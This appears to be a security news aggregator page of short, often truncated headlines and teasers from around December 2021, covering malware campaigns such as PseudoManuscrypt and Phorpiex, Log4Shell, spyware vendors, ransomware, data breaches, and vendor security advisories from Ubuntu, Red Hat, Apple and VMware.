In June 2021, our specialists discovered new malware called PseudoManuscrypt. They didnt go out hunting specifically for it; our standard antivirus engine detected the malicious files, which were similar to known malware. Why PseudoManuscrypt is dangerous PseudoManuscrypts methods are fairly standard for spyware. It show more ...
In this episode of the podcast (#232), Tomislav Peričin of the firm ReversingLabs joins us to talk about Log4Shell, the vulnerability in the ubiquitous Log4j Apache library. Tomislav tells us why issues related to Log4j won’t be going away anytime soon and how organizations must adapt to deal with the risk it poses. show more ...
Google has explained how NSO Group developed an exploit that would allow users of its software to gain access to an iPhone and install spyware – without a target ever even clicking a link.
Threat actors using Cobalt Strike beacons to spread laterally through a network, steal files, and deliver malware can get quick access to infiltrated networks with Emotet’s direct installation of it.
The Ransomware as a Service (RaaS) landscape underwent another major shift in the third quarter as new variants emerged to become the dominant players in the ecosystem, according to Intel 471.
CERT Yoroi tracked the malware distribution infrastructure which was abusing the Bitbucket code repository infrastructures to evade detection mechanism, URL, and domain reputation security check.
The state of New Jersey alleged that Regional Cancer Care Associates LLC, RCCA MSO LLC, and RCCA MD LLC failed to adequately safeguard the personal data and PHI of thousands of cancer patients.
These firms are said to have targeted an estimated 50,000 victims, including journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists.
This attack could have given total visibility and complete control of the network and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply.
Europe’s foray into quantum communication is extremely promising. It establishes a secure form of encryption, protecting communications against eavesdropping or even from being controlled by a hacker.
The targets of the attack by the group called "Charming Kitten" included the Israeli "government and business sector", Check Point said in a statement late Wednesday, without providing specifics.
Ransomware is a primary threat for businesses, and with the past year or so considered the golden era for operators, security experts say this criminal enterprise will reach new heights in the future.
The top three security priorities are adding layered security for truly secure remote work, making remote work easier for end-users, and making remote work easier for admins.
The Coombe hospital isolated and locked down its IT services once the ransomware attack was discovered “on a precautionary basis” and is working with the HSE to resolve the issue.
Advertised as an app that allowed users to personalize their default SMS messages, Color Message was a front to deliver Joker, one of the most prolific forms of Android malware.
The Richmond-based cultural institution said “there is no evidence” that the security breach is connected to the ransomware attack on the IT systems for Virginia legislative agencies.
Qumra Capital led the round with support from new investor Forgepoint Capital and participation from existing investors Accel, Glilot Capital Partners, Norwest Venture Partners, and Target Global.
This move by cybercriminals from using LDAP callback URLs to RMI is a significant advance in the continuing attack, and companies must be aware of it when attempting to secure all potential channels.
While QAKBOT is one of the payloads it stages filelessly in the registry, the stager is also capable of staging for multiple malware, a capability that can be abused for more campaigns in the future.
Finite Recruitment has confirmed it experienced a cyber incident in October, which resulted in a "small subset" of the company's data being downloaded and published on the dark web.
At its core, the bug is related to Windows Cloud Clipboard, a feature added to Windows 10 v1809 release, a feature that allows users to sync their local clipboard history to their Microsoft accounts.
As per Chainalysis’ 2022 Crypto Crime Report, crypto scams have earned a revenue of $7.7 billion from victims worldwide. This is an 81% rise from that in 2020. Rug pulls accounted for 37% of all crypto scam revenue.
Researchers uncovered details about the Earth Centaur group that has been targeting transportation firms and government agencies associated with transportation. The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks. The observed show more ...
A class-action lawsuit against Canadian financial services firm Desjardins has provisionally settled for $156 million after a 2019 data breach exposed the personal information of 10 million customers.
To seek out Log4Shell vulnerabilities in newly built open-source software, Google is partnering with security firm Code Intelligence to provide continuous fuzzing for Log4j.
According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or a local network.
It was fixed with the release of VMware Workspace ONE UEM console versions 21.5.0.37, 21.2.0.27, 20.11.0.40, and 20.0.8.36. VMware Workspace ONE UEM patch 21.9.0.13 and above also address the bug.
A new Kaspersky study has highlighted how scammers are trying to take advantage of the excitement surrounding the new film, with intensified activity observed ahead of its premiere.
In July 2021, KELA discovered 48 discussion threads on dark web marketplaces. From those threads, KELA determined that ransomware actors look for certain criteria when looking to purchase accesses.
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals show more ...
This bug report describes a vulnerability in ART that allows normal applications to insert arbitrary code into unused executable memory in zygote and other applications.
Backdoor.Win32.Mellpon.b malware suffers from an information leakage vulnerability.
Backdoor.Win32.BNLite malware suffers from a buffer overflow vulnerability.
Ubuntu Security Notice 5192-2 - USN-5192-1 fixed a vulnerability in Apache Log4j 2. This update provides the corresponding update for Ubuntu 16.04 ESM. Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run programs via a special crafted input. An attacker could use this vulnerability to cause a denial of service or possibly execute arbitrary code. Various other issues were also addressed.
Ubuntu Security Notice 5202-1 - Varnavas Papaioannou discovered that the FTP client implementation in OpenJDK accepted alternate server IP addresses when connecting with FTP passive mode. An attacker controlling an FTP server that an application connects to could possibly use this to expose sensitive information. This show more ...
Red Hat Security Advisory 2021-5186-04 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a code execution vulnerability.
Red Hat Security Advisory 2021-5183-06 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a code execution vulnerability.
Red Hat Security Advisory 2021-5184-04 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include a code execution vulnerability.
Red Hat Security Advisory 2021-5107-06 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include code execution and denial of service vulnerabilities.
Red Hat Security Advisory 2021-5179-02 - PostgreSQL is an advanced object-relational database management system. Issues addressed include a man-in-the-middle vulnerability.
Red Hat Security Advisory 2021-5176-04 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.
Red Hat Security Advisory 2021-5195-02 - Red Hat Identity Management is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
Red Hat Security Advisory 2021-5192-04 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.
Red Hat Security Advisory 2021-5171-03 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.
Red Hat Security Advisory 2021-5191-02 - Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and show more ...
Red Hat Security Advisory 2021-5197-03 - PostgreSQL is an advanced object-relational database management system. Issues addressed include a man-in-the-middle vulnerability.
VMware Security Advisory 2021-0029 - VMware Workspace ONE UEM console patches address a server-side request forgery (SSRF) vulnerability.
Google's OSS Fuzz tool aims to make common open source software more secure and stable by combining modern fuzzing techniques with scalable, distributed execution.
Call For Papers for RootedCON 2022, a technology congress that will be held in Madrid, Spain March 10th through the 12th of 2022. The conference has a capacity of 2,500 to 3,000 people.
Ubuntu Security Notice 5198-1 - It was discovered that HTMLDOC improperly handled malformed URIs from an input html file. An attacker could use this to cause a denial of service.
Ubuntu Security Notice 5199-1 - It was discovered that the urllib.request.AbstractBasicAuthHandler class in Python contains regex with a quadratic worst-case time complexity. Specially crafted traffic from a malicious HTTP server could cause a regular expression denial of service condition for a client. It was show more ...
Ubuntu Security Notice 5201-1 - It was discovered that the Python urllib http client could enter into an infinite loop when incorrectly handling certain server responses. Specially crafted traffic from a malicious HTTP server could cause a denial of service condition for a client.
Ubuntu Security Notice 5200-1 - It was discovered that the urllib.request.AbstractBasicAuthHandler class in Python contains regex allowing for catastrophic backtracking. Specially crafted traffic from a malicious HTTP server could cause a regular expression denial of service condition for a client. It was discovered show more ...
Apple Security Advisory 2021-12-15-7 - Safari 15.2 addresses buffer overflow, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-6 - watchOS 8.3 addresses buffer overflow, bypass, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-5 - tvOS 15.2 addresses buffer overflow, bypass, code execution, integer overflow, out of bounds read, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-4 - Security Update 2021-008 Catalina addresses buffer overflow, bypass, code execution, heap corruption, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-3 - macOS Big Sur 11.6.2 addresses buffer overflow, bypass, code execution, heap corruption, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-2 - macOS Monterey 12.1 addresses buffer overflow, bypass, code execution, heap corruption, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Apple Security Advisory 2021-12-15-1 - iOS 15.2 and iPadOS 15.2 addresses buffer overflow, bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.
Cryptocurrency users in Ethiopia, Nigeria, India, Guatemala, and the Philippines are being targeted by a new variant of the Phorpiex botnet called Twizt that has resulted in the theft of virtual coins amounting to $500,000 over the last one year. Israeli security firm Check Point Research, which detailed the attacks, said the latest evolutionary version "enables the botnet to operate
Industrial and government organizations, including enterprises in the military-industrial complex and research laboratories, are the targets of a new malware botnet dubbed PseudoManyscrypt that has infected roughly 35,000 Windows computers this year alone. The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group's attack toolset, Kaspersky
It's no secret that the internet isn't a very safe place. And it's not hard to understand why. It's a medium that connects billions of people around the world that affords bad actors enough anonymity to wreak havoc without getting caught. It's almost as if the internet's tailor-made to enable show more ...
Meta Platforms on Thursday revealed it took steps to deplatform seven cyber mercenaries that it said carried out "indiscriminate" targeting of journalists, dissidents, critics of authoritarian regimes, families of opposition, and human rights activists located in over 100 countries, amid mounting scrutiny of surveillance technologies. To that end, the company said it alerted 50,000 users of
